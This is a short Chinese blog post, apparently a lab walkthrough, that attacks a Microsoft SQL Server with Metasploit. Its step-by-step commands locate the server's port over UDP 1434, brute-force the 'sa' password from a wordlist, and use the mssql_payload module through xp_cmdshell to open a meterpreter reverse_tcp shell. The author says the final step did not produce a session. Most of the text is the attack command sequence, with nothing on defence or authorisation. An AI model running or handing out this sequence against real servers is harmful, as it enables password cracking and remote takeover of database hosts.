首先通过UDP1434端口,查询Sql server服务的TCP动态端口
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set rhosts 192.168.80.33
msf auxiliary(mssql_ping) > set threads 16
msf auxiliary(mssql_ping) > exploit
然后暴力破解sa用户的密码
msf auxiliary(mssql_ping) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set rhosts 192.168.80.33
msf auxiliary(mssql_login) > set username sa
msf auxiliary(mssql_login) > set pass_file /root/1.txt
msf auxiliary(mssql_login) > exploit
xp_cmdshell
以sa用户运行mssql时,可以执行xp_cmdshell存储过程,该存储过程允许直接与操作系统进行交互并执行命令。
msf auxiliary(mssql_login) > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set lhost 192.168.80.163
msf exploit(mssql_payload) > set rhost 192.168.80.33
msf exploit(mssql_payload) > set password 123456
msf exploit(mssql_payload) > exploit
成功exploit后,会获得目标主机meterpreter shell。但是我并没有测试成功,上传Stage完成后,提示如下内容。。
[*] Exploit completed, but no session was created.
网友评论